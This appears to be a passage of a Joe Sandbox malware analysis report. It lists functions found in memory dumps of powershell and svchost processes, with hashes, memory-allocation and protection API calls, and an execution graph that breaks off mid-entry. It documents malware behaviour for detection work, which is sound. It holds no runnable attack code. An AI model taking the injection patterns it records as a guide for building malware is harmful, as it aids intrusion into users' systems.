                                                                                                                                                  • Opcode ID: 2564d5ca13ce4cc8f830f71642e455d922bb1e7a03a6226b7812596c855e4d3d
                                                                                                                                                  • Instruction ID: 5c5edb94660336305019ebb29b2ff0a29e1cd866af5f85fa28dc53156b8491bd
                                                                                                                                                  • Opcode Fuzzy Hash: 2564d5ca13ce4cc8f830f71642e455d922bb1e7a03a6226b7812596c855e4d3d
                                                                                                                                                  • Instruction Fuzzy Hash: BC313C34B011288FCF25DB64D8516EEB7B2BF89304F1084E9D909AB355CB35AE85CF82
                                                                                                                                                  Function 07690A64 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 95e5cd90edad20d8fbd33b58cfafed5919933f372c2edc72763677c4c1dc120b
                                                                                                                                                  • Instruction ID: 453c97ad39afc35af18ea6b76674ad60c89485e259d60567fb24f8d901e74bcf
                                                                                                                                                  • Opcode Fuzzy Hash: 95e5cd90edad20d8fbd33b58cfafed5919933f372c2edc72763677c4c1dc120b
                                                                                                                                                  • Instruction Fuzzy Hash: A9215BB53043476BCB640AB988107277FAE5F85308F28807AA586CB7D7D97AD88483B1
                                                                                                                                                  Function 07690668 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f71b22ae6d2862a9f66340f0fc48fea80a703ea7aec79f5b480861174938beae
                                                                                                                                                  • Instruction ID: 67c0faaceed759c1ff285f720929b2fba4c9c66cae640162a328dba86af709b4
                                                                                                                                                  • Opcode Fuzzy Hash: f71b22ae6d2862a9f66340f0fc48fea80a703ea7aec79f5b480861174938beae
                                                                                                                                                  • Instruction Fuzzy Hash: 6101D4B63002178FCF2459AAD40066AB79E9BC6326F14843BE956D7740DB72C8458760
                                                                                                                                                  Function 049CE993 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2159980044.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_49c0000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8cafa3cdb1a61590b3c9f726b127d140b4bfc3fdd904798f36f495409a9cf79e
                                                                                                                                                  • Instruction ID: fb0b230b921d61d7a1cefe17c4e50219a5ec5be758d22618f16955bfdb1ade5e
                                                                                                                                                  • Opcode Fuzzy Hash: 8cafa3cdb1a61590b3c9f726b127d140b4bfc3fdd904798f36f495409a9cf79e
                                                                                                                                                  • Instruction Fuzzy Hash: 6C119030D10258DFEF74DAA8D5897ACB775AF8531AF24143ED002B61A0AB7469C9CB12
                                                                                                                                                  Function 07699F09 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 587ae2cc66d907761a68b668a8ab01b9e6562e75e620502257358bc3e640b37c
                                                                                                                                                  • Instruction ID: 917f92b7b262137ee11c2adaf8151125ac03117cc19e7b509bd76068f663787d
                                                                                                                                                  • Opcode Fuzzy Hash: 587ae2cc66d907761a68b668a8ab01b9e6562e75e620502257358bc3e640b37c
                                                                                                                                                  • Instruction Fuzzy Hash: A4012BF2B011225BCB2616BC081656E9B139FE1759B0840BED9029FB46DE389D8747D3
                                                                                                                                                  Function 049CFC3F Relevance: .0, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2159980044.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_49c0000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c8753782a6a3eb8b89838647e39de341664121973667e05adc466e456696c563
                                                                                                                                                  • Instruction ID: 9da7e24ef91141a82e4a63cccdf6010ba3f9e031a7bf1018a4171e94f57ce899
                                                                                                                                                  • Opcode Fuzzy Hash: c8753782a6a3eb8b89838647e39de341664121973667e05adc466e456696c563
                                                                                                                                                  • Instruction Fuzzy Hash: 0101F475A00505DFCB14CF98C8809ADF7B6FF88314B258669D519A7694C732BC51CB94
                                                                                                                                                  Function 07692D85 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: decbb9e91eac2912d01edc5022bcf8b34570347f80e8440eaa69bd78693d3350
                                                                                                                                                  • Instruction ID: f2a8b210013f38a59117f0ca507df193cdf42eca43d6fc8c7dc131f1db53aad4
                                                                                                                                                  • Opcode Fuzzy Hash: decbb9e91eac2912d01edc5022bcf8b34570347f80e8440eaa69bd78693d3350
                                                                                                                                                  • Instruction Fuzzy Hash: 3CE06D76609241EFDB15CB14C964B11BB71BB82604F08C1EAD10A8F293C736E846CB51

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 076918B0 Relevance: 14.2, Strings: 11, Instructions: 467COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$t~yq$$fq$$fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-3488976364
                                                                                                                                                  • Opcode ID: d1813aff696327194743585ec760c2c83d8300331e4a03852faaa4573ea0a527
                                                                                                                                                  • Instruction ID: 9ab3037da2d4759551bb60093eedf75c147e7a78b7259727f9abb915f28fb045
                                                                                                                                                  • Opcode Fuzzy Hash: d1813aff696327194743585ec760c2c83d8300331e4a03852faaa4573ea0a527
                                                                                                                                                  • Instruction Fuzzy Hash: F7E118B1B0021B9FCF289B79845166ABBAAAFC6310F34807AD446DB741DF31DD46CB91
                                                                                                                                                  Function 076920C0 Relevance: 12.8, Strings: 10, Instructions: 307COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-1802041116
                                                                                                                                                  • Opcode ID: 6d9cb9f80388929d9e7590792e679be113813e7e3aef9a1c4e2b95964e7eb0cc
                                                                                                                                                  • Instruction ID: 86b6e265b18b7f8d16d97c5d485a177c6953336ff0cc46240b4103ee17284234
                                                                                                                                                  • Opcode Fuzzy Hash: 6d9cb9f80388929d9e7590792e679be113813e7e3aef9a1c4e2b95964e7eb0cc
                                                                                                                                                  • Instruction Fuzzy Hash: FDA139B1714206EFDF258A78C86077ABBAEBFC5250F14807AD506CB781DB35C882C7A1
                                                                                                                                                  Function 0769CDA4 Relevance: 8.9, Strings: 7, Instructions: 163COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$TQkq$TQkq$tPfq$$fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-1114105955
                                                                                                                                                  • Opcode ID: a2a6b9edd706e7987e31b6ca26515c5dc205af6a423c02a519216b4459837137
                                                                                                                                                  • Instruction ID: 987ea4e71799110a13dca7583f4f524acd5a3ac4ac8d5302084e516ba0c0a94c
                                                                                                                                                  • Opcode Fuzzy Hash: a2a6b9edd706e7987e31b6ca26515c5dc205af6a423c02a519216b4459837137
                                                                                                                                                  • Instruction Fuzzy Hash: D051CFB1610206DFCF248E35C504BA677AABF45751F19807AE8039B391D731DD82CBA2
                                                                                                                                                  Function 0769C86F Relevance: 7.7, Strings: 6, Instructions: 162COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq$$fq
                                                                                                                                                  • API String ID: 0-3915454692
                                                                                                                                                  • Opcode ID: 04d624a299f301dc5b91182b3ceddd461c11d6f42d55bf44537772440e694188
                                                                                                                                                  • Instruction ID: 4ae2bdfeb710d8c770f8e5ca77b94a10f2242d6964e07677ac56f6cb7d3a1ed3
                                                                                                                                                  • Opcode Fuzzy Hash: 04d624a299f301dc5b91182b3ceddd461c11d6f42d55bf44537772440e694188
                                                                                                                                                  • Instruction Fuzzy Hash: FF51D2B1A002069FDF24CF34C550BAABBEAAF45750F1484B6E806AB795D735DC81CBB1
                                                                                                                                                  Function 0769D7C0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$tPfq$$fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-3445244938
                                                                                                                                                  • Opcode ID: 005577972bb8b41d1162c4d8a4b57405b19af849bda634dc247febc56545aec2
                                                                                                                                                  • Instruction ID: 565739ae710a75532f36f4c41698acb4d166fe587b58d81de2c0c7f025ccc993
                                                                                                                                                  • Opcode Fuzzy Hash: 005577972bb8b41d1162c4d8a4b57405b19af849bda634dc247febc56545aec2
                                                                                                                                                  • Instruction Fuzzy Hash: 8B61BEF070020AEFDF248E25C645BBAB7AAAF45351F148075E8065B795C735EC91CBA1
                                                                                                                                                  Function 07694C45 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-3759051638
                                                                                                                                                  • Opcode ID: 98897bf58758f91a8ec8c061eb49e82e1aabf5fc12edeeca50032856e4804f5c
                                                                                                                                                  • Instruction ID: d2ea68f2add1128a87bd8ab3fa46b94ac864f34296302f58541929b24c566cdc
                                                                                                                                                  • Opcode Fuzzy Hash: 98897bf58758f91a8ec8c061eb49e82e1aabf5fc12edeeca50032856e4804f5c
                                                                                                                                                  • Instruction Fuzzy Hash: C031DEBA704296CFCF294A748440577BFAEAFC2211B24847AC5438B391DF36C887DB52
                                                                                                                                                  Function 076981E8 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$tPfq$$fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-3445244938
                                                                                                                                                  • Opcode ID: 41ac11dd224865c3627c2f904c6570ed84e3068332670b78cee427f0c791edf9
                                                                                                                                                  • Instruction ID: 437b640a1ddfa49479b4167180a4c5741809f6f253cde5f1c0489d95e3121a95
                                                                                                                                                  • Opcode Fuzzy Hash: 41ac11dd224865c3627c2f904c6570ed84e3068332670b78cee427f0c791edf9
                                                                                                                                                  • Instruction Fuzzy Hash: 2231D5B1A00707DFDF248E65C540BA6B7AAAF87760F18C17AD817AB390CB31D845CB91
                                                                                                                                                  Function 0769C9B6 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq
                                                                                                                                                  • API String ID: 0-3104067135
                                                                                                                                                  • Opcode ID: 28de54ed92c0558e5c9a4feee94ded176cc20ee70bba4f18145b7ae8691bc8ec
                                                                                                                                                  • Instruction ID: b894f809e5bcd80cb8fab92153c558da3ec0188aa2471cc68dbb0ae174fa2e85
                                                                                                                                                  • Opcode Fuzzy Hash: 28de54ed92c0558e5c9a4feee94ded176cc20ee70bba4f18145b7ae8691bc8ec
                                                                                                                                                  • Instruction Fuzzy Hash: 2531A4B4B102159FDF24CF78C454A5ABBEAFF88714F148565E906AB741C731EC02CBA1
                                                                                                                                                  Function 07699118 Relevance: 5.3, Strings: 4, Instructions: 255COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$4'fq$4'fq
                                                                                                                                                  • API String ID: 0-359900465
                                                                                                                                                  • Opcode ID: ee916e0a1a5ae76d8d098e6624f230fcab77594dd5f247b77a348e912548bf47
                                                                                                                                                  • Instruction ID: 45627519d00e42d8eacd51c5304156ed1ff0387a65d66f64aa1e4acd72899de0
                                                                                                                                                  • Opcode Fuzzy Hash: ee916e0a1a5ae76d8d098e6624f230fcab77594dd5f247b77a348e912548bf47
                                                                                                                                                  • Instruction Fuzzy Hash: 9D81FBB5714306CFCF259AB884112EABBAAAFC6311F15807FC506CB781DB35D886C791
                                                                                                                                                  Function 0769DB88 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: XRkq$XRkq$tPfq$$fq
                                                                                                                                                  • API String ID: 0-1861106669
                                                                                                                                                  • Opcode ID: a896689d9be77350a2c1bd32d7c21aa84d30e07f2f06adcb689aa4796328d4b0
                                                                                                                                                  • Instruction ID: 8805453bd759c88defcf3021f7096062058753d25f4ea1eedc4f7f4ee1f3b96b
                                                                                                                                                  • Opcode Fuzzy Hash: a896689d9be77350a2c1bd32d7c21aa84d30e07f2f06adcb689aa4796328d4b0
                                                                                                                                                  • Instruction Fuzzy Hash: 084180B1B00205DBCF249E29C144AA9B7FAAF45714F15C079E4066B394C771DD45CFA0
                                                                                                                                                  Function 0769189E Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-2206495126
                                                                                                                                                  • Opcode ID: fba487465aa6af6442755441b2a15ec719839cd00ebf0dcf52f0e8673894378e
                                                                                                                                                  • Instruction ID: 62640a3cb25ddc5475ef50f40aeb283b8b55068304f7432f4df125514d7dd916
                                                                                                                                                  • Opcode Fuzzy Hash: fba487465aa6af6442755441b2a15ec719839cd00ebf0dcf52f0e8673894378e
                                                                                                                                                  • Instruction Fuzzy Hash: B931C6F5A0020F9BDF2C8E65C140376BBAEAF47351F34817AD8569A394D7318D81D792
                                                                                                                                                  Function 07690E08 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $fq$$fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-2113499236
                                                                                                                                                  • Opcode ID: 89cd22cbde5dc564b0d268b6360547a75bc79dcdab43fa514885cdc44f6fbd22
                                                                                                                                                  • Instruction ID: 949010acc26e497bae6b82534df3da9b779999253eaa2aecf6e4f48e8f3dd406
                                                                                                                                                  • Opcode Fuzzy Hash: 89cd22cbde5dc564b0d268b6360547a75bc79dcdab43fa514885cdc44f6fbd22
                                                                                                                                                  • Instruction Fuzzy Hash: 052127B671421B5BDF28997D88807377A9F9FC5715F24843AE547CB381DE36C8428361

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 005E02D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 005E0326
                                                                                                                                                    • Part of subcall function 005E00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 005E00CD
                                                                                                                                                    • Part of subcall function 005E00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005E0279
                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 005E0378
                                                                                                                                                  • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 005E03E7
                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005E0407
                                                                                                                                                  • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 005E042E
                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005E0456
                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 005E0471
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000014.00000003.2350322616.00000000005E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_20_3_5e0000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                  • String ID: ,
                                                                                                                                                  • API String ID: 3867569247-3772416878
                                                                                                                                                  • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                  • Instruction ID: c436ec2abc35beffdaccb5377efc7e4aa9169802cda577dc8633586f784272b0
                                                                                                                                                  • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                  • Instruction Fuzzy Hash: 626120B1900249EFDF14DFA5C984ADEBBB9FF48350F108419F699A7280D770E981CB60
                                                                                                                                                  Function 005E00A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 005E00CD
                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005E0279
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000014.00000003.2350322616.00000000005E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_20_3_5e0000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                  • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                  • Instruction ID: 3c0416f0ea2d79139756c47ccfd2b102b3b365e388f55c737f1bd3f3b7d7a5a6
                                                                                                                                                  • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                  • Instruction Fuzzy Hash: 8E71BD71E04289DFCB45CF99C885BEDBBF0BB08314F245495E5A1FB281C274AA81DF24

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 005E0283 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000014.00000003.2350322616.00000000005E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_20_3_5e0000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                  • Instruction ID: d940d44ad8f8cab942fc004c1f752e4edd63df799e43430b0de0347ace88a99c
                                                                                                                                                  • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                  • Instruction Fuzzy Hash: 58F0627DA01240CF8B18CF0AC58CC957BF6FB95720B655495D544EB2A1D3F0DD85C750

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:5.1%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:17.7%
                                                                                                                                                  Total number of Nodes:503
                                                                                                                                                  Total number of Limit Nodes:54
                                                                                                                                                  execution_graph 39470 7df4f3b731b4 39471 7df4f3b731ca 39470->39471 39472 7df4f3b731e6 39470->39472 39473 7df4f3b731d6 lstrcmpiW 39471->39473 39473->39472 39474 7df4f3c3ccc8 39475 7df4f3c3ccd8 39474->39475 39477 7df4f3c3ccf5 39474->39477 39475->39477 39478 7df4f3c3cc98 39475->39478 39479 7df4f3c3ccbc 39478->39479 39480 7df4f3c3cca6 39478->39480 39479->39475 39480->39479 39482 7df4f3c43ef0 39480->39482 39483 7df4f3c43f04 39482->39483 39485 7df4f3c43f6c 39482->39485 39483->39485 39486 7df4f3c3f3d0 39483->39486 39485->39479 39487 7df4f3c3f409 39486->39487 39489 7df4f3c3f43e 39486->39489 39487->39489 39490 7df4f3c3e590 39487->39490 39489->39485 39491 7df4f3c3e5a4 39490->39491 39493 7df4f3c3e5b8 39490->39493 39491->39489 39493->39491 39494 7df4f3c462ec 39493->39494 39496 7df4f3c46362 39494->39496 39497 7df4f3c46310 39494->39497 39496->39493 39497->39496 39498 7df4f3c45cc4 39497->39498 39499 7df4f3c45cf3 39498->39499 39500 7df4f3c45d8c calloc 39499->39500 39501 7df4f3c45d59 __swprintf_l 39499->39501 39500->39501 39501->39496 40077 7df4f3b714c0 malloc 39520 7df4f3b736bc 39521 7df4f3b736d7 39520->39521 39522 7df4f3b7379f SetErrorMode 39521->39522 39524 7df4f3b737b8 39521->39524 39525 7df4f3b784b4 39522->39525 39526 7df4f3b784cb 39525->39526 39527 7df4f3b785e0 39526->39527 39529 7df4f3b784e0 39526->39529 39532 7df4f3b77ae0 39527->39532 39531 7df4f3b784f2 __swprintf_l 39529->39531 39562 7df4f3b8c0a4 7 API calls 39529->39562 39531->39524 39533 7df4f3b77b25 39532->39533 39537 7df4f3b78456 __swprintf_l 39533->39537 39563 7df4f3b6456c 39533->39563 39535 7df4f3b77c03 39547 7df4f3b783f6 39535->39547 39566 7df4f3b64998 39535->39566 39537->39531 39540 7df4f3b77c95 39542 7df4f3b77e47 39540->39542 39540->39547 39572 7df4f3b64f54 39540->39572 39541 7df4f3b64f54 malloc 39541->39542 39542->39541 39543 7df4f3b77f07 39542->39543 39576 7df4f3b64d90 39543->39576 39547->39537 39587 7df4f3b842bc free socket 39547->39587 39548 7df4f3b77f49 39548->39547 39583 7df4f3b7327c 39548->39583 39550 7df4f3b77fd1 39551 7df4f3b92050 NtAcceptConnectPort 39550->39551 39554 7df4f3b77ff1 39550->39554 39551->39554 39552 7df4f3b7825d 39553 7df4f3b62de8 Thread32First CloseHandle SuspendThread ResumeThread 39552->39553 39553->39547 39554->39552 39555 7df4f3b75870 GetVolumeInformationW 39554->39555 39556 7df4f3b781c6 39555->39556 39557 7df4f3b85b00 CreateNamedPipeW BindIoCompletionCallback ConnectNamedPipe 39556->39557 39558 7df4f3b7823f 39557->39558 39559 7df4f3b76984 CreateTimerQueueTimer 39558->39559 39560 7df4f3b7824e 39559->39560 39561 7df4f3bb8d44 socket 39560->39561 39561->39552 39562->39531 39588 7df4f3b64090 39563->39588 39565 7df4f3b6457f 39565->39535 39567 7df4f3b64d68 __swprintf_l 39566->39567 39568 7df4f3b649da __swprintf_l 39566->39568 39567->39540 39568->39567 39569 7df4f3b64bb6 malloc 39568->39569 39569->39567 39571 7df4f3b64bcb __swprintf_l 39569->39571 39570 7df4f3b64d5f free 39570->39567 39571->39570 39573 7df4f3b64f6e 39572->39573 39574 7df4f3b64f7a malloc 39573->39574 39575 7df4f3b64f8f __swprintf_l 39573->39575 39574->39575 39575->39540 39577 